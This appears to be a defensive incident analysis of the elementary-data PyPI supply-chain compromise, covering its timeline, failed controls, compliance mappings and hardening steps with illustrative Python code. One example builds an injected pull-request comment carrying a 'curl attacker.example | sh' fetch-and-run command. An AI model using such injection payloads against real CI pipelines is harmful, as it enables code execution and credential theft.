What Happened
On April 24, 2025, attackers published version 0.23.3 of the Python package elementary-data to PyPI. This malicious release contained code designed to exfiltrate cloud credentials from any environment where it was installed. Going by the timestamps below, the package remained available for roughly 10.5 to 13.5 hours: from 22:20 UTC on April 24 until its removal sometime between 08:51 and 11:51 UTC on April 25.
The attack exploited a script injection flaw in the package maintainer's GitHub Actions workflow. The attacker crafted a pull request comment that the CI/CD pipeline handled unsafely, which let them inject malicious code into the package build process. Any data engineer who ran pip install elementary-data==0.23.3 during that window potentially exposed AWS credentials, GCP service account keys, Azure tokens, and database connection strings to the attacker.
Timeline
April 24, 22:20 UTC: Malicious version 0.23.3 published to PyPI
April 24-25 (roughly 10.5 to 13.5 hours): Package available for installation; credential theft active
April 25, 8:51-11:51 UTC: Package removed from PyPI
The narrow detection window is significant. Organizations with automated dependency updates or developers installing packages during off-hours may not have noticed the compromise until credentials were already exfiltrated.
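As a quick check on the length of the exposure window, the timestamps in the timeline can be subtracted directly. This is only arithmetic on the published times; the variable names are illustrative.

```python
from datetime import datetime, timezone

# Timestamps taken from the timeline above (all UTC).
published = datetime(2025, 4, 24, 22, 20, tzinfo=timezone.utc)
removed_earliest = datetime(2025, 4, 25, 8, 51, tzinfo=timezone.utc)
removed_latest = datetime(2025, 4, 25, 11, 51, tzinfo=timezone.utc)


def hours_between(start, end):
    """Return the elapsed time between two datetimes in hours."""
    return (end - start).total_seconds() / 3600


min_window = hours_between(published, removed_earliest)
max_window = hours_between(published, removed_latest)
print(f"Exposure window: {min_window:.1f} to {max_window:.1f} hours")
```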
Which Controls Failed or Were Missing
Unsafe GitHub Actions Workflow Configuration
The root cause was a workflow that processed untrusted input, specifically pull request comments, without proper sanitization. GitHub Actions substitutes expressions such as ${{ github.event.comment.body }} into the text of a run: step before the shell executes it, so a crafted comment becomes part of the script and can run arbitrary commands. This is a well-documented anti-pattern, yet it remains common in open-source repositories.
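The mechanism can be illustrated with a deliberately simplified model of expression substitution. This is not GitHub's implementation; render_expressions, the sample comment, and the attacker.example URL are all hypothetical, and nothing here is executed in a shell.

```python
import re


def render_expressions(script_template, context):
    """Simplified model: paste context values into the script text verbatim."""
    def substitute(match):
        return str(context.get(match.group(1).strip(), ""))
    return re.sub(r"\$\{\{(.*?)\}\}", substitute, script_template)


# Hypothetical attacker-controlled pull request comment.
comment_body = 'nice work"; curl https://attacker.example/x.sh | sh; echo "'
context = {"github.event.comment.body": comment_body}

# Unsafe: the expression sits inside the script, so the comment becomes code.
unsafe_step = 'echo "Comment: ${{ github.event.comment.body }}"'
rendered_unsafe = render_expressions(unsafe_step, context)

# Safer: the script only references an environment variable; the comment
# travels separately as data and never becomes part of the script text.
safe_step = 'echo "Comment: $COMMENT_BODY"'
rendered_safe = render_expressions(safe_step, context)
safe_env = {"COMMENT_BODY": comment_body}

print(rendered_unsafe)
print(rendered_safe)
```

In the unsafe case the rendered script contains the attacker's curl command as a separate shell statement; in the safer case the script text is unchanged by the comment.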
No Package Signing or Verification
The compromised package was published without cryptographic signatures that would allow consumers to verify authenticity. PyPI stopped accepting PGP signatures in 2023 and now supports optional digital attestations (PEP 740) instead, but these are not enforced, and pip does not verify them by default.
Missing Dependency Pinning and Lock Files
Organizations that installed the package likely did so with unpinned version specifications (elementary-data>=0.23.0 rather than elementary-data==0.23.2). This meant automated systems pulled the malicious version immediately upon publication.
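A rough way to spot floating specifiers is to scan requirement lines for anything that is not an exact == pin. The sketch below is a regex heuristic, not a full parser for the requirements file format; unpinned_requirements and the sample lines are hypothetical.

```python
import re

# An exact pin looks like "name==1.2.3"; wildcard pins such as "==1.2.*" do not count.
PINNED = re.compile(r"^[A-Za-z0-9._-]+(\[[^\]]+\])?\s*==\s*[^\s;*]+(?=\s|;|$)")


def unpinned_requirements(lines):
    """Return requirement lines that are not pinned to one exact version."""
    flagged = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("-"):  # skip blanks and pip options
            continue
        if not PINNED.match(line):
            flagged.append(line)
    return flagged


sample = [
    "elementary-data>=0.23.0   # floating: picks up any new release",
    "elementary-data==0.23.2",
    "requests",
    "# a comment",
]
print(unpinned_requirements(sample))
```

An exact pin alone still trusts whatever file the index serves for that version, which is why hash verification is recommended later in this article.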
Inadequate Secret Rotation Procedures
The exposure window of several hours was long enough for credential theft, but the real damage depends on how long those credentials remained valid. Organizations without automated secret rotation or anomalous access detection faced extended risk.
Lack of Runtime Integrity Monitoring
The malicious code executed during package installation. Organizations without file integrity monitoring or runtime application self-protection (RASP) had no visibility into the exfiltration activity until after the fact.
What the Relevant Standards Require
PCI DSS v4.0.1 Requirement 6.3.2
Requirement 6.3.2 calls for maintaining an inventory of bespoke and custom software, including the third-party software components incorporated into it, to support vulnerability and patch management. That scope reaches supply chain security: organizations processing payment data need to know which third-party components they run and validate that those components, including packages in their dependency chains, don't introduce vulnerabilities or malicious code.
Gap: Most organizations don't treat open-source dependencies as "third-party code" requiring security validation, despite the identical risk profile.
NIST 800-53: SA-12 (Supply Chain Protection; SR family in Rev 5)
SA-12, as defined in Rev 4, requires organizations to protect against supply chain threats by employing security safeguards as part of a comprehensive, defense-in-breadth information security strategy. Rev 5 withdrew SA-12 and moved its requirements into the SR (Supply Chain Risk Management) family. Specific controls include:
- SA-12(5), now SR-3(2): Limitation of harm from malicious code
- SA-12(9), now SR-7: Operations security for supply chain elements
- SA-12(11), now SR-6(1): Penetration testing and analysis of supply chain elements
Gap: Few organizations perform ongoing security analysis of their transitive dependencies, especially for data engineering tools that may not be considered "critical" infrastructure.
ISO 27001:2022 Control 8.30 (Outsourced Development)
Control 8.30 requires the organization to direct, monitor, and review the activities related to outsourced system development. While this control typically applies to contracted development, the principle extends to open-source dependencies: they're code you're running but didn't write.
Gap: Dependency installation is rarely governed by the same security requirements as custom code or contracted development.
Lessons and Action Items for Your Team
Immediate: Audit for Exposure
If you use elementary-data or any package in the Python data engineering ecosystem, check your installation logs, CI build logs, and lock files for April 24-25. Look for version 0.23.3 specifically. pip writes a log file only when run with --log (or with PIP_LOG set), so adjust the path below to wherever your logs actually live:
grep -Ei "elementary[-_]data(==|-)0\.23\.3" /var/log/pip.log
If you find it, assume credential compromise. Immediately rotate all cloud credentials accessible from affected environments: not just the credentials you think were exposed, but everything in that scope.
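Alongside log searches, each Python environment can be asked directly which version it has installed. The sketch below uses the standard library's importlib.metadata; the COMPROMISED table and both helper functions are hypothetical names. It reports only what is installed now, so an environment that installed 0.23.3 and was later upgraded will look clean here and still needs the log review.

```python
from importlib import metadata

# Package name -> versions to treat as compromised (from the incident summary).
COMPROMISED = {"elementary-data": {"0.23.3"}}


def installed_version(package, lookup=metadata.version):
    """Return the installed version string, or None if the package is absent."""
    try:
        return lookup(package)
    except metadata.PackageNotFoundError:
        return None


def is_compromised(package, version):
    """Return True when the given version is on the compromised list."""
    return version is not None and version in COMPROMISED.get(package, set())


if __name__ == "__main__":
    for name in COMPROMISED:
        found = installed_version(name)
        if is_compromised(name, found):
            status = "COMPROMISED: rotate credentials"
        else:
            status = "compromised version not currently installed"
        print(f"{name}: {found or 'not installed'} -> {status}")
```

Run it with the interpreter of every virtual environment, container image, and CI runner that could have installed the package.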
Short-term: Harden GitHub Actions Workflows
If you maintain packages or use GitHub Actions for CI/CD:
- Never use expressions in run commands with untrusted input. Instead of placing ${{ github.event.comment.body }} directly in a run: step, pass it through an env: variable and reference that variable, quoted, in the script. GitHub does not sanitize the value, but the shell then treats it as data rather than as part of the script.
- Enable workflow approval requirements for first-time contributors. GitHub's settings allow you to require manual approval before workflows run on pull requests from new users.
- Use OpenID Connect (OIDC) tokens instead of long-lived credentials in workflows. GitHub's OIDC integration with AWS, GCP, and Azure provides short-lived tokens scoped to specific workflows.
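To find existing instances of the first problem, a line-based scan of workflow files can flag untrusted expressions that appear inside run: blocks. The sketch below is a heuristic that assumes conventional YAML indentation and a short, non-exhaustive list of attacker-controllable fields. It does not parse YAML, and find_unsafe_run_lines and the sample workflow are hypothetical.

```python
import re

# A few attacker-controllable contexts; this list is illustrative, not exhaustive.
UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.(event\.(comment|issue|pull_request|review)\.(body|title)"
    r"|head_ref)\b[^}]*\}\}"
)
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")


def find_unsafe_run_lines(workflow_text):
    """Return (line_number, text) for untrusted expressions inside run: blocks."""
    findings = []
    run_indent = None  # column of the current "run:" key, or None outside one
    for number, line in enumerate(workflow_text.splitlines(), start=1):
        match = RUN_KEY.match(line)
        if match:
            run_indent = len(match.group(1)) + len(match.group(2) or "")
        elif run_indent is not None:
            indent = len(line) - len(line.lstrip())
            if line.strip() and indent <= run_indent:
                run_indent = None  # dedent: the run block has ended
        if run_indent is not None and UNTRUSTED.search(line):
            findings.append((number, line.strip()))
    return findings


sample = """\
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Unsafe echo
        run: |
          echo "${{ github.event.comment.body }}"
      - name: Safer echo
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
        run: |
          echo "$COMMENT_BODY"
"""
for number, text in find_unsafe_run_lines(sample):
    print(f"line {number}: {text}")
```

Only the first step is flagged; the second passes the same value through env:, which is the pattern recommended above.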
Medium-term: Implement Dependency Integrity Controls
- Pin all dependencies with hash verification. Use lock files (requirements.txt with hashes, poetry.lock, Pipfile.lock) and verify them in CI:
pip install --require-hashes -r requirements.txt
- Deploy a private package mirror or proxy (Artifactory, Nexus, or AWS CodeArtifact). Configure it to:
  - Cache packages after manual security review
  - Block new versions until approved
  - Log all package installations for forensic capability
- Run dependency scanning in CI with tools that check for known malicious packages (not just CVEs). Socket Security, Phylum, and Checkmarx Supply Chain Security specifically detect malicious behavior patterns.
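The idea behind hash verification is that an artifact is accepted only if its digest matches one recorded when the dependency was reviewed. The sketch below shows that comparison conceptually; it is not pip's implementation, and the byte strings stand in for real wheel or sdist files.

```python
import hashlib


def sha256_hex(data):
    """Return the SHA-256 digest of the given bytes as a hex string."""
    return hashlib.sha256(data).hexdigest()


def matches_pinned_hash(artifact, allowed_hashes):
    """Accept an artifact only if its digest was recorded at review time."""
    return sha256_hex(artifact) in allowed_hashes


# Placeholder contents standing in for downloaded package files.
reviewed_artifact = b"contents of the release that was reviewed"
unexpected_artifact = b"contents of a release nobody reviewed"

# Digests recorded in the lock file when the dependency was approved.
allowed = {sha256_hex(reviewed_artifact)}

print(matches_pinned_hash(reviewed_artifact, allowed))
print(matches_pinned_hash(unexpected_artifact, allowed))
```

Because a newly published version has a digest that is not in the lock file, an install in hash-checking mode fails rather than silently pulling it.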
Long-term: Build Defense in Depth
Implement least-privilege credential scoping. The credentials stolen in this attack were likely over-provisioned. Use IAM permissions boundaries and resource tags to limit blast radius.
Deploy runtime monitoring that detects unexpected network connections during package installation. Tools like Falco or osquery can alert on outbound connections from pip or Python setup scripts.
Establish automated credential rotation with maximum lifetimes of 24-48 hours for programmatic access. AWS Secrets Manager, Azure Key Vault, and GCP Secret Manager all support this.
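A maximum-lifetime policy reduces to comparing each credential's age against a threshold. The sketch below assumes you can export creation timestamps from your secret store; the inventory entries and needs_rotation are hypothetical, and no cloud API is called.

```python
from datetime import datetime, timedelta, timezone

MAX_LIFETIME = timedelta(hours=48)  # upper bound suggested above; tune to policy


def needs_rotation(created_at, now=None, max_lifetime=MAX_LIFETIME):
    """Return True when a credential is at or past its maximum lifetime."""
    if now is None:
        now = datetime.now(timezone.utc)
    return now - created_at >= max_lifetime


# Hypothetical inventory: credential name -> creation time (UTC).
now = datetime(2025, 4, 25, 12, 0, tzinfo=timezone.utc)
inventory = {
    "ci-deploy-key": datetime(2025, 4, 25, 6, 0, tzinfo=timezone.utc),
    "warehouse-service-account": datetime(2025, 4, 20, 9, 0, tzinfo=timezone.utc),
}

stale = sorted(
    name for name, created in inventory.items() if needs_rotation(created, now)
)
print(stale)
```

A check like this is best run on a schedule so that credentials which silently outlive the policy are surfaced before an incident rather than during one.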
Create an incident response playbook specifically for supply chain compromises. Your existing breach procedures likely assume direct intrusion, not malicious code in trusted packages. The response timeline and evidence preservation steps are different.
The elementary-data attack succeeded because it exploited the trust relationship between developers and their tools. You can't eliminate that trust, but you can verify it continuously. Treat every package installation as a potential security event, and build controls that assume compromise rather than hoping for package maintainer vigilance.



